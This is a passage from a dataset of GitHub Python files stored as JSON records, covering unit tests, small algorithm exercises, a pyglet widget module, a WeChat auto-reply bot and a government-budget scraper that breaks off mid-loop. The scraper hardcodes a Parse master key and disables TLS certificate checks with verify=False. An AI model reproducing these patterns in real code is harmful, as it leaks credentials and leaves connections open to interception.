;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n if arg == 1:\n return 2\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n y = x\n return 3\n\n scope = f2(0)\n assert scope == {\"arg\": 0, \"x\": 1}\n assert scope.return_value == 1\n\n scope = f2(1)\n assert scope == {\"arg\": 1, \"x\": 1}\n assert scope.return_value == 2\n scope = f2(2)\n assert scope == {\"arg\": 2, \"x\": 1, \"y\": 1}\n assert scope.return_value == 3\n\n @scoped_function\n def f3(arg):\n if arg == 0:\n return 1\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n if arg == 1:\n return (1, 2, 3)\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n if arg == 2:\n return 3\n y = x\n return 4\n\n if cfg.default_method == \"bytecode\":\n with pytest.raises(ValueError, match=\"The first 2 return statements are too far away\"):\n f3(0)\n with pytest.raises(ValueError, match=\"The first 2 return statements are too far away\"):\n f3(1)\n if cfg.default_method == \"trace\":\n scope = f3(0)\n assert scope == {\"arg\": 0, \"x\": 1}\n assert scope.return_value == 1\n scope = f3(1)\n assert scope == {\"arg\": 1, \"x\": 1}\n assert scope.return_value == (1, 2, 3)\n scope = f3(2)\n assert scope == {\"arg\": 2, \"x\": 1}\n assert scope.return_value == 3\n scope = f3(3)\n assert scope == {\"arg\": 3, \"x\": 1, \"y\": 1}\n assert scope.return_value == 4\n # fmt: on\n\n\n# @pytest.mark.xfail(reason=\"Local variable can't yet be the same name as an outer variable\")\n# This limitation may actually be okay to live with\ndef test_inner_and_outer_variable():\n def f1():\n x = 1\n\n scope1 = innerscope.call(f1)\n assert scope1 == {\"x\": 1}\n\n @scope1.bindto\n def f2():\n x = x + 1 # pragma: no cover\n\n with pytest.raises(\n UnboundLocalError,\n match=\"local variable 'x' referenced before assignment.\\n\\nThis probably\"\n \"|cannot access local variable 'x' where it is not associated with a value.\"\n \"\\n\\nThis probably\",\n ):\n f2()\n\n @scoped_function\n def f3():\n raise UnboundLocalError(\"hahaha\")\n\n with pytest.raises(UnboundLocalError, match=\"hahaha$\"):\n f3()\n\n\ndef test_default_args():\n @innerscope.callwith(0, z=3)\n def f(w, x=1, *args, y=2, z, **kwargs):\n pass\n\n assert f == {\"w\": 0, \"x\": 1, \"y\": 2, \"z\": 3, \"args\": (), \"kwargs\": {}}\n\n\ndef test_list_comprehension():\n closure_val = 2\n\n def f():\n y = [i for i in range(global_x)]\n z = [j for j in range(closure_val)]\n\n assert innerscope.call(f) == {\"y\": [0], \"z\": [0, 1], \"global_x\": 1, \"closure_val\": 2}\n scoped_f = scoped_function(f, use_globals=False, use_closures=False)\n assert scoped_f.missing == {\"global_x\", \"closure_val\"}\n scope = scoped_f.bind(global_x=2, closure_val=1)()\n assert scope == {\"y\": [0, 1], \"z\": [0], \"global_x\": 2, \"closure_val\": 1}\n\n\ndef test_inner_functions():\n def f():\n closure_val = 10\n\n def g():\n y = global_x + 1\n z = closure_val + 1\n return y, z\n\n scope = innerscope.call(f)\n assert scope.keys() == {\"closure_val\", \"g\", \"global_x\"}\n assert scope[\"g\"]() == (2, 11)\n scoped_f = scoped_function(f, use_globals=False, use_closures=False)\n assert scoped_f.missing == {\"global_x\"}\n scope = scoped_f.bind(global_x=2)()\n assert scope.keys() == {\"closure_val\", \"g\", \"global_x\"}\n assert scope[\"g\"]() == (3, 11)\n\n\ndef test_inner_class():\n def f1():\n class A:\n x = global_x + 1\n\n scope = innerscope.call(f1)\n assert scope.keys() == {\"A\", \"global_x\"}\n assert scope[\"A\"].x == 2\n scoped_f = scoped_function(f1, use_globals=False, use_closures=False)\n assert scoped_f.missing == {\"global_x\"}\n assert scoped_f.bind(global_x=2)()[\"A\"].x == 3\n\n a = 10\n\n def f2():\n b = 100\n\n def g(self):\n pass\n\n class A:\n x = global_x + 1\n\n def __init__(self):\n pass\n\n y = x + 1\n z = a + b\n gm = g\n\n scope = innerscope.call(f2)\n assert scope.outer_scope.keys() == {\"a\", \"global_x\"}\n assert scope.inner_scope.keys() == {\"b\", \"g\", \"A\"}\n assert scope[\"A\"].x == 2\n assert scope[\"A\"].z == 110\n assert scope[\"A\"]().gm() is None\n scoped_f = scoped_function(f2, use_globals=False, use_closures=False)\n assert scoped_f.missing == {\"a\", \"global_x\"}\n scope = scoped_f.bind(a=20, global_x=2)()\n assert scope[\"A\"].x == 3\n assert scope[\"A\"].z == 120\n\n\ndef test_bad_method():\n def f():\n x = 1\n\n with pytest.raises(ValueError, match=\"method= argument to ScopedFunc\"):\n scoped_function(f, method=\"bad_method\")\n old_default = cfg.default_method\n try:\n cfg.default_method = \"bad_method\"\n with pytest.raises(ValueError, match=\"method= argument to ScopedFunc\"):\n scoped_function(f)\n cfg.default_method = \"default\"\n with pytest.raises(ValueError, match=\"silly\"):\n scoped_function(f)\n finally:\n cfg.default_method = old_default\n assert innerscope.call(f) == {\"x\": 1}\n\n\ndef test_generator():\n def f():\n foo = 2\n yield 5\n yield global_x\n return 10\n\n gf = scoped_function(f)\n [x, y] = gf()\n assert x == 5\n assert y == 1\n\n gen = gf()\n try:\n while True:\n next(gen)\n except StopIteration as exc:\n scope = exc.value\n assert scope == {\"foo\": 2, \"global_x\": 1}\n assert scope.return_value == 10\n\n\ndef test_coroutine():\n async def f(): # pragma: no cover\n await 5\n\n with pytest.raises(ValueError, match=\"does not yet work on coroutine functions\"):\n scoped_function(f)\n\n\ndef test_asyncgen():\n async def f(): # pragma: no cover\n yield 5\n\n with pytest.raises(ValueError, match=\"does not yet work on async generator functions\"):\n scoped_function(f)\n\n\ndef test_classmethod():\n class A:\n @scoped_function\n def f(self):\n x = 1\n y = x + 1\n return y + 1\n\n @classmethod\n @scoped_function\n def g(cls):\n x = 10\n y = x + 10\n return y + 10\n\n @scoped_function\n def h(self):\n x = 100\n yield x\n return x + 100\n\n a = A()\n scope = a.f()\n assert scope == {\"self\": a, \"x\": 1, \"y\": 2}\n assert scope.return_value == 3\n\n scope = A.g()\n assert scope == {\"cls\": A, \"x\": 10, \"y\": 20}\n assert scope.return_value == 30\n\n gen = a.h()\n assert next(gen) == 100\n try:\n next(gen)\n except StopIteration as exc:\n scope = exc.value\n assert scope == {\"self\": a, \"x\": 100}\n assert scope.return_value == 200\n\n\ndef test_shadow_builtins():\n min = 1\n\n def f(sum):\n dict = min + sum + max\n return dict + 1\n\n sf = scoped_function(f)\n assert sf.missing == set()\n assert sf.outer_scope == {\"min\": 1}\n assert sf.builtin_names == {\"max\"}\n\n sf = scoped_function(f, {\"max\": 100, \"bool\": 999})\n\n assert sf.missing == set()\n assert sf.outer_scope == {\"min\": 1, \"max\": 100}\n assert sf.builtin_names == set()\n scope = sf(10)\n assert scope == {\"min\": 1, \"sum\": 10, \"max\": 100, \"dict\": 111}\n assert scope.return_value == 112\n\n sf = scoped_function(f, use_closures=False)\n assert sf.missing == {\"min\"}\n assert sf.outer_scope == {}\n assert sf.builtin_names == {\"max\"}\n\n sf = scoped_function(f, {\"min\": 1000, \"max\": 100, \"bool\": 999}, use_closures=False)\n assert sf.missing == set()\n assert sf.outer_scope == {\"min\": 1000, \"max\": 100}\n assert sf.builtin_names == set()\n scope = sf(10)\n assert scope == {\"min\": 1000, \"sum\": 10, \"max\": 100, \"dict\": 1110}\n assert scope.return_value == 1111\n\n def g():\n a = hex + 1\n\n sg = scoped_function(g)\n assert sg.inner_names == {\"a\"}\n assert sg.outer_scope == {\"hex\": 1}\n assert sg.builtin_names == set()\n assert sg.missing == set()\n assert sg() == {\"a\": 2, \"hex\": 1}\n\n sg = scoped_function(g, use_globals=False)\n assert sg.inner_names == {\"a\"}\n assert sg.outer_scope == {}\n assert sg.missing == set()\n assert sg.builtin_names == {\"hex\"}\n\n sg = sg.bind(hex=100)\n assert sg.inner_names == {\"a\"}\n assert sg.outer_scope == {\"hex\": 100}\n assert sg.builtin_names == set()\n assert sg.missing == set()\n assert sg() == {\"a\": 101, \"hex\": 100}\n\n\ndef test_from_scopedgenerator():\n def gen():\n x = 1\n\n sgen = scoped_function(gen)\n sgen2 = scoped_function(sgen)\n assert sgen() == {\"x\": 1}\n assert sgen2() == {\"x\": 1}\n\n\ndef test_bad_type():\n def f(x):\n y = x + 1\n return y + 1\n\n cf = classmethod(f)\n with pytest.raises(TypeError, match=\"expects a Python function\"):\n scoped_function(cf)\n assert innerscope.call(f, 1) == {\"x\": 1, \"y\": 2}\n\n\n# Define globally so pickle can find it easily\ndef global_func():\n a = 1\n b = a + 1\n\n\ndef test_pickle():\n f = scoped_function(global_func)\n assert f() == dict(a=1, b=2)\n s = pickle.dumps(f)\n f2 = pickle.loads(s)\n assert f2() == dict(a=1, b=2)\n","repo_name":"eriknw/innerscope","sub_path":"innerscope/tests/test_core.py","file_name":"test_core.py","file_ext":"py","file_size_in_byte":17664,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"21"} +{"seq_id":"70467852212","text":"from random import randint\n\nresultados = ['Cara', 'Coroa']\nconts = [0, 0]\nwhile True:\n esc = input('Lançar moeda? [S/N]').strip().upper()\n while esc not in 'SN':\n print('Não entendi')\n if esc == 'S':\n a = randint(0, 1)\n print(f'O resultado é {resultados[a]}')\n conts[a] += 1\n else:\n break\nprint(f'''Resultado:\nCaras: {conts[0]}\nCoroas: {conts[1]}''')\n# lançamento de cara ou coroa\n","repo_name":"atico0/python","sub_path":"aleatorios/teste5.py","file_name":"teste5.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28168009822","text":"from io import StringIO\n\nclass Flow:\n VTYPE = 'CAR'\n FLOWS_DIR = '/home/madis/SUMO/tmp/'\n def __init__(self, _id, route, t, n_cars):\n self.fid = _id\n self.route_name = route\n self.t = t\n self.n_cars = n_cars\n self.comment = None\n\n def to_xml(self):\n return f''\n\n def flows_to_xml(flows, buf=None):\n if buf is None:\n buf = StringIO()\n buf.write('\\n')\n # route file should be sorted by depart time\n for flow in sorted(flows, key=lambda f: f.t):\n if flow.n_cars == 0:\n continue\n buf.write('\\t'+flow.to_xml()+'\\n')\n if flow.comment is not None:\n buf.write('\\t\\n')\n buf.write('\\n')\n buf.flush()\n return buf\n\nif __name__ == '__main__':\n f1 = Flow('test1', 'f1', 10, 100)\n f2 = Flow('test2', 'f2', 5, 100)\n\n xml = Flow.flows_to_xml([f1, f2]).getvalue()\n print(xml)\n","repo_name":"faerics/masters-thesis","sub_path":"python_src/simulation/flow.py","file_name":"flow.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"43179815745","text":"import pyglet\nfrom pyglet import gl\nimport numpy as np\n\nfrom luminate import utility\nfrom luminate import datasource as ds\n\n\nclass AbstractWidget:\n\n _numPoints = 500\n\n def __init__(self, window, x, y, width, height):\n self._window = window\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n\n def draw(self):\n\n gl.glTranslatef(self.x, self.y, 0)\n\n gl.glPushMatrix()\n self._draw_impl()\n gl.glPopMatrix()\n\n def _draw_impl(self):\n pass\n\n def update(self, dt):\n pass\n\n\nnum_textures = 0\n\n\nclass TextureWidget(AbstractWidget):\n\n def __init__(self, window, x, y, width, height, alpha=1.0, data_source=None):\n super().__init__(window, x, y, width, height)\n\n self._alpha = alpha\n\n if data_source is None:\n tex_data_2d = np.zeros((width, height, 3))\n mid_grey = np.array((0.5, 0.5, 0.5))\n tex_data_2d[...] = mid_grey\n data_source = ds.ConstantDataSource(tex_data_2d)\n\n self.data_source = data_source\n\n global num_textures\n self._tex_id = num_textures\n num_textures += 1\n self._tex_gl_handle = self._create_texture(self.data_source.get_data(), self._tex_id)\n\n def update(self, dt):\n self.data_source.update(dt)\n if self.data_source.has_new_data:\n self._tex_gl_handle = self._create_texture(self.data_source.get_data(), self._tex_id)\n\n def _create_texture(self, tex_array_2d, tex_id, shape=None):\n\n if tex_array_2d.dtype == np.dtype('uint8'):\n tex_array_2d = tex_array_2d.astype(float)\n tex_array_2d = tex_array_2d/256\n\n if shape is None:\n shape = tex_array_2d.shape\n\n height, width, depth = shape\n\n if depth == 1:\n gl_format = gl.GL_LUMINANCE\n elif depth == 4:\n gl_format = gl.RGBA\n else:\n gl_format = gl.GL_RGB\n\n tex_array_1d = np.ravel(tex_array_2d)\n if (width*height*depth != len(tex_array_1d)):\n raise ValueError(\"Shape does not match data!\")\n tex = (gl.GLfloat * len(tex_array_1d))(*tex_array_1d)\n\n tex_handle = gl.GLuint(tex_id)\n\n gl.glBindTexture(gl.GL_TEXTURE_2D, tex_handle)\n gl.glPixelStorei(gl.GL_UNPACK_ALIGNMENT, 1)\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MAG_FILTER, gl.GL_NEAREST)\n gl.glTexParameteri(gl.GL_TEXTURE_2D, gl.GL_TEXTURE_MIN_FILTER, gl.GL_NEAREST)\n gl.glTexImage2D(gl.GL_TEXTURE_2D, 0, gl_format, width, height,\n 0, gl_format, gl.GL_FLOAT, tex)\n\n return tex_handle\n\n def _draw_texture(self, tex_handle, x, y, width, height, alpha=1.0):\n gl.glColor4f(1.0, 1.0, 1.0, alpha)\n gl.glBindTexture(gl.GL_TEXTURE_2D, tex_handle)\n gl.glBegin(gl.GL_QUADS)\n gl.glTexCoord2i(0, 0)\n gl.glVertex2i(x, y+height)\n gl.glTexCoord2i(0, 1)\n gl.glVertex2i(x, y)\n gl.glTexCoord2i(1, 1)\n gl.glVertex2i(x+width, y)\n gl.glTexCoord2i(1, 0)\n gl.glVertex2i(x+width, y+height)\n gl.glEnd()\n\n def _draw_impl(self):\n self._draw_texture(self._tex_gl_handle, 0, 0, self.width, self.height, alpha=self._alpha)\n\n\nclass NoiseWidget(AbstractWidget):\n\n def update(self, dt):\n points = utility.random_points(self._numPoints,\n self.width, self.height).tolist()\n self._points = np.ravel(points, order=\"F\").tolist()\n self._colours = utility.random_colours(self._numPoints)\n\n def _draw_impl(self):\n\n pyglet.graphics.draw(self._numPoints, gl.GL_POINTS,\n ('v2i/stream', self._points),\n ('c3B/stream', self._colours))\n\n\nclass LinePlotWidget(AbstractWidget):\n\n def __init__(self, window, x, y, width, height,\n line_col=(1.0, 1.0, 1.0), data_source=None):\n super().__init__(window, x, y, width, height)\n\n self._line_col = line_col\n\n if data_source is None:\n data_source = ds.ConstantDataSource(np.ones(10))\n\n border_points = (0, 0, 0, self.height, self.width, self.height, self.width, 0)\n self._border = pyglet.graphics.vertex_list(4, ('v2i', border_points))\n\n self._data_source = data_source\n self._update_data()\n\n def update(self, dt):\n self._data_source.update(dt)\n if self._data_source.has_new_data:\n self._update_data()\n\n def _update_data(self):\n data = self._data_source.get_data()\n normed_data = norm_data(data)\n self._update_vertex_list(normed_data)\n\n def _update_vertex_list(self, normed_data):\n count = normed_data.size\n y_points = (normed_data * self.height)\n x_points = np.linspace(0, self.width, count)\n points = np.stack((x_points, y_points))\n points = np.ravel(points, order=\"F\").tolist()\n self._vertex_list = pyglet.graphics.vertex_list(count, ('v2f', points))\n\n def _draw_impl(self):\n self._border.draw(gl.GL_LINE_LOOP)\n self._vertex_list.draw(gl.GL_LINE_STRIP)\n\n\nclass HeatmapWidget(TextureWidget):\n\n def __init__(self, window, x, y, width, height,\n min_col=(0.0, 1.0, 0.0), max_col=(1.0, 0.0, 0.0),\n data_source=None):\n super().__init__(window, x, y, width, height)\n\n self._minCol = np.array(min_col)\n self._maxCol = np.array(max_col)\n\n if data_source is None:\n data_source = ds.ConstantDataSource(np.ones((2, 2)))\n\n self.data_source = data_source\n\n data = data_source.get_data()\n self.data_width, self.data_height = data.shape\n self._update_texture(data)\n\n def _update_texture(self, data):\n self._data = data\n\n shape = data.shape\n normed_data = norm_data(data)\n\n dataVector = np.ravel(normed_data)\n a = np.outer(self._minCol, (1 - dataVector))\n b = np.outer(self._maxCol, dataVector)\n tex_data_2d = np.ravel(a+b, order=\"F\").reshape(shape[0], shape[1], 3)\n self._tex_gl_handle = self._create_texture(tex_data_2d)\n\n def update(self, dt):\n self.data_source.update(dt)\n if self.data_source.has_new_data:\n data = self.data_source.get_data()\n self._update_texture(data)\n\n\ndef norm_data(data):\n min_point = np.amin(data)\n max_point = np.amax(data)\n\n # If every data point is the same, normalise to 0.5\n if max_point == min_point:\n min_point = 0\n max_point *= 2\n\n normed_data = (data - min_point) / (max_point - min_point)\n return normed_data\n\n\ndef test():\n pass\n\n\nif __name__ == '__main__':\n import timeit\n print(1/(timeit.timeit(\"test()\", setup=\"from __main__ import test\", number=10)/10))\n","repo_name":"michaeljamesorr/luminate","sub_path":"luminate/widget.py","file_name":"widget.py","file_ext":"py","file_size_in_byte":6794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18203954002","text":"class Solution:\n def maxProfit(self, k: int, prices: List[int]) -> int:\n if k >= len(prices) // 2:\n sell = 0\n hold = -math.inf\n\n for price in prices:\n sell = max(sell, hold + price)\n hold = max(hold, sell - price)\n\n return sell\n\n sell = [0] * (k + 1)\n hold = [-math.inf] * (k + 1)\n\n for price in prices:\n for i in range(k, 0, -1):\n sell[i] = max(sell[i], hold[i] + price)\n hold[i] = max(hold[i], sell[i - 1] - price)\n\n return sell[k]\n","repo_name":"walkccc/LeetCode","sub_path":"solutions/0188. Best Time to Buy and Sell Stock IV/0188.py","file_name":"0188.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":756,"dataset":"github-code","pt":"21"} +{"seq_id":"70115927412","text":"class Person(object):\n\n def __init__(self, name, birth_year, gender, father=None, mother=None):\n self.__siblings_observers = []\n self.successors = []\n self.name = name\n self.birth_year = birth_year\n self.gender = gender\n self.father = father\n self.mother = mother\n if self.mother:\n self.__siblings_observers.append(self.mother.children)\n self.mother.successors.append(self)\n if self.father:\n self.__siblings_observers.append(self.father.children)\n self.father.successors.append(self)\n\n def get_brothers(self):\n return self.__get_my_siblings(\"M\")\n\n def get_sisters(self):\n return self.__get_my_siblings(\"F\")\n\n def __get_my_siblings(self, gender):\n siblings = set()\n for observer in self.__siblings_observers:\n siblings.update(observer(gender))\n siblings.discard(self)\n return list(siblings)\n\n def children(self, gender=\"both\"):\n if gender == \"both\":\n return self.successors\n else:\n return [child for child in self.successors if child.gender == gender]\n\n def is_direct_successor(self, other):\n return other in self.successors or self in other.successors\n","repo_name":"DesislavaPanchovaPetrova/python-retrospective","sub_path":"task3/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15932254389","text":"import sys\nfrom collections import defaultdict\nfrom functools import reduce\nimport heapq\n\ninput_file = sys.argv[1] if len(sys.argv) > 1 else 'input.txt'\n\ndepths = defaultdict(int)\nwith open(input_file, 'r') as file:\n for i, line in enumerate(file):\n line_values = [int(x) for x in line.split()[0]]\n for j, value in enumerate(line_values):\n depths[(i,j)] = value\n\ndef is_low_point(x, y):\n adjacents = [(x+1, y), (x-1, y), (x, y+1), (x, y-1)]\n\n for adjacent in adjacents:\n if adjacent in depths and depths[adjacent] <= depths[(x, y)]:\n return False\n\n return True\n\ndef basin_size(x, y):\n size = 0\n keys = [(x,y)]\n\n seen = set()\n\n while len(keys) > 0:\n key = keys.pop()\n\n if key not in depths or key in seen:\n continue\n\n seen.add(key)\n size += 1\n\n adjacent_keys = [\n (key[0]+1, key[1]),\n (key[0]-1, key[1]),\n (key[0], key[1]+1),\n (key[0], key[1]-1)\n ]\n\n for adjacent in adjacent_keys:\n if depths[adjacent] != 9 and depths[adjacent] > depths[key]:\n keys.append(adjacent)\n\n return size\n\ndef answer1():\n answers = []\n for key in depths.keys():\n if is_low_point(*key):\n answers.append(depths[key]+1)\n\n return sum(answers)\n\nprint(answer1())\n\ndef answer2():\n answers = []\n heapq.heapify(answers)\n\n for key in depths.keys():\n if is_low_point(*key):\n heapq.heappush(answers, basin_size(*key))\n\n return reduce(lambda x, y: x*y, list(heapq.nlargest(3, answers)))\n\nprint(answer2())","repo_name":"Mlordx/aoc-21","sub_path":"day09/day9.py","file_name":"day9.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10073264834","text":"# https://leetcode.com/explore/featured/card/january-leetcoding-challenge-2021/579/week-1-january-1st-january-7th/3594/\n\nclass Solution:\n def findKthPositive(self, arr, k: int) -> int:\n counter = 0\n for i, n in enumerate(arr):\n if i == 0:\n counter += n - 1\n else:\n counter += n - arr[i-1] - 1\n \n if counter >= k:\n return n - (counter - k) - 1\n \n if counter < k:\n return arr[-1] + (k - counter)\n\n\n\nif __name__ == \"__main__\":\n arr = [1,2,3,4]\n k = 2\n s = Solution()\n print(s.findKthPositive(arr, k))","repo_name":"mmdaz/my_solved_algorithm_problems","sub_path":"january-leetcoding-challenge-2021/kth-missing-number.py","file_name":"kth-missing-number.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"42416912916","text":"\"\"\"\nhowSum(targetSum, numbers) - takes a list of nums and a target sum as input and returns the possible set of numbers that result in target sum.\n\"\"\"\n\n\ndef howSum(target: int, nums: list) -> list:\n '''\n returns the set of numbers in nums list that can produce the target sum. \n\n BRUTE FORCE METHOD \n Complexity: n = len(nums), m = target \n O(n^m * m) time and \n O(m+m) space\n\n Parameters\n ----------\n target : int\n required target sum\n\n nums : list\n provided list of non-negative numbers\n\n Returns\n -------\n list\n list of numbers that form target sum\n\n '''\n\n if target == 0:\n return []\n\n if target < min(nums):\n return None\n ans = []\n for num in nums:\n r = howSum(target-num, nums)\n if r != None:\n r.append(num)\n return r\n\n return None\n\n\ndef howSum_memoized(target: int, nums: list, memo={}) -> list:\n '''\n returns the set of numbers in nums list that can produce the target sum. \n\n MEMOIZATION METHOD \n Complexity: n = len(nums), m = target \n O(n*m^2) time and \n O(m^2) space\n\n Parameters\n ----------\n target : int\n required target sum\n\n nums : list\n provided list of non-negative numbers\n\n\n Returns\n -------\n list\n list of numbers that form target sum\n\n '''\n if target in memo:\n return memo[target]\n\n if target == 0:\n return []\n\n if target < 0:\n return None\n\n for num in nums:\n r = howSum_memoized(target-num, nums, memo)\n if r != None:\n r.append(num)\n memo[target] = r\n return r\n\n memo[target] = None\n return None\n\ndef howSum_tab(target:int, nums:list[int]) -> list :\n '''\n returns the set of numbers in nums list that can produce the target sum. \n\n MEMOIZATION METHOD \n Complexity: n = len(nums), m = target \n O(n*m^2) time and \n O(m^2) space\n\n Parameters\n ----------\n target : int\n required target sum\n\n nums : list\n provided list of non-negative numbers\n\n\n Returns\n -------\n list\n list of numbers that form target sum\n\n '''\n\n table = [None for _ in range(target+1)]\n table[0] = []\n\n for i in range(target+1):\n if table[i] == None: continue \n for num in nums:\n if i+num <= target: \n table[i+num] = table[i].copy()\n table[i+num].append(num)\n\n return table[target]\n\n\nprint(howSum(7, [2, 4])) # None\nprint(howSum(7, [5, 3, 4, 7])) # [4,3]\nprint(howSum_tab(8, [2, 3, 5])) # [2, 2, 2, 2]\nprint(howSum_tab(300, [7, 14])) # None\nprint(howSum_tab(300, [7, 20, 14])) # [20, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7]","repo_name":"AlokPratapSingh22/Algos","sub_path":"DynamicProgramming/DP tutorial ques/howSum.py","file_name":"howSum.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71331815734","text":"#%% 找微信开了没,微信的位置\r\n\r\ndef wechat_init():\r\n\r\n pos1 = 'pos1.png'\r\n pos2 = 'pos2.png'\r\n send = 'send.png'\r\n standby = 'block2.png'\r\n while True:\r\n location1 = pyautogui.locateCenterOnScreen(pos1, confidence=0.9)\r\n # location2 = pyautogui.locateCenterOnScreen(pos2, confidence=0.9)\r\n location3 = pyautogui.locateCenterOnScreen(send, confidence=0.9)\r\n location4 = pyautogui.locateCenterOnScreen(standby, confidence=0.9)\r\n if location1 and location3 and location4:\r\n break\r\n else:\r\n print(\"未打开微信,1秒后重试\")\r\n time.sleep(1)\r\n print(location1)\r\n return location1, location3, location4\r\n\r\n#%% 找有没有新消息\r\n\r\ndef mainWork():\r\n red = 'red.png'\r\n while True:\r\n location = pyautogui.locateCenterOnScreen(red, confidence=0.9)\r\n if location:\r\n break\r\n else:\r\n print(\"没有新消息,1秒后重试\")\r\n time.sleep(1)\r\n return location\r\n\r\n\r\ndef find_txt():\r\n chat = 'pos3.png'\r\n while True:\r\n locations = pyautogui.locateAllOnScreen(chat) # , confidence=0.9\r\n if locations:\r\n break\r\n else:\r\n print(\"没有消息,1秒后重试\")\r\n time.sleep(1)\r\n time.sleep(0.2)\r\n txt = list(locations)\r\n if txt != []:\r\n pos = sorted(txt, key=lambda x:x[1], reverse=True)[0]\r\n print(pos)\r\n pyautogui.doubleClick([pos[0]+25, pos[1], pos[2], pos[3]])\r\n time.sleep(0.5)\r\n pyautogui.hotkey('ctrl', 'c')\r\n time.sleep(0.2)\r\n txt = pyperclip.paste()\r\n # print(str(txt))\r\n return str(txt)\r\n\r\n\r\ndef send_response(location1, location3, response):\r\n pyautogui.click([location1[0]+50, location1[1]+50])\r\n pyperclip.copy(response)\r\n pyautogui.hotkey('ctrl', 'v')\r\n time.sleep(0.5)\r\n pyautogui.click(location3)\r\n\r\n\r\ndef send_emoji(location1):\r\n pyautogui.click(location1)\r\n time.sleep(0.2)\r\n like = 'like.png'\r\n location2 = pyautogui.locateCenterOnScreen(like, confidence=0.9)\r\n pyautogui.click(location2)\r\n time.sleep(0.2)\r\n emoji = 'emoji.png'\r\n location3 = pyautogui.locateCenterOnScreen(emoji, confidence=0.9)\r\n pyautogui.click(location3)\r\n time.sleep(0.2)\r\n\r\n\r\nif __name__ == '__main__':\r\n import pyautogui\r\n import time\r\n import pyperclip\r\n import CHAT\r\n\r\n location1, location3, location4 = wechat_init()\r\n access_token = CHAT.CHAT_init()\r\n pyautogui.click(location4)\r\n time.sleep(0.1)\r\n while True:\r\n red = mainWork()\r\n time.sleep(0.5)\r\n pyautogui.click(red)\r\n time.sleep(0.5)\r\n txt = find_txt()\r\n time.sleep(0.5)\r\n print(txt)\r\n if txt == '':\r\n send_emoji(location1)\r\n pyautogui.click(location4)\r\n time.sleep(0.5)\r\n continue\r\n response = CHAT.txtTotxt(access_token, txt)\r\n # time.sleep(0.5)\r\n print(response)\r\n send_response(location1, location3, response)\r\n time.sleep(1)\r\n pyautogui.click(location4)\r\n time.sleep(1)\r\n\r\n\r\n\r\n","repo_name":"YoungSeng/Autowechat","sub_path":"My_model.py","file_name":"My_model.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"21"} +{"seq_id":"28156687783","text":"from bs4 import BeautifulSoup\nimport requests\nimport os\nos.environ[\"PARSE_API_ROOT\"] = \"https://astanasu.herokuapp.com/parse\"\nfrom parse_rest.datatypes import Function, Object, GeoPoint\nfrom parse_rest.connection import register\nfrom parse_rest.query import QueryResourceDoesNotExist\nfrom parse_rest.connection import ParseBatcher\nfrom parse_rest.core import ResourceRequestBadRequest, ParseError\n\nAPPLICATION_ID = 'AberdeenGirl'\nREST_API_KEY = 'AberdeenGirlClient'\nMASTER_KEY = 'AberdeenMasterKey'\n\nregister(APPLICATION_ID, REST_API_KEY, master_key=MASTER_KEY)\n\n\nclass Programme(Object):\n pass\nclass SubProgramm(Object):\n\tpass\nbase_link = \"https://budget.egov.kz\"\ndef parseBasic(number): \n\theaders = {'Accept-Language': 'ru-RU'}\n\tresult = requests.get(\"https://budget.egov.kz/budgetprogram/budgetprogram?page=\"+number+\"&budgetState=APPROVED\",headers = headers, verify=False)\n\treturn result.content\ndef parseDetailed(link):\n\theaders = {'Accept-Language': 'ru-RU'}\n\tresult = requests.get(link,headers = headers, verify=False)\n\treturn result.content\nsubProgrammes = []\n\nfor page in range(1,135):\n\thtml = parseBasic(str(page))\n\tsoup = BeautifulSoup(html)\n\tsamples = soup.find_all(\"a\", \"bpname\")\n\tfor sample in samples:\n\t\tsubProgrammes = []\n\t\tlink = base_link+sample['href']+\"&lang=ru\"\n\t\ttext = 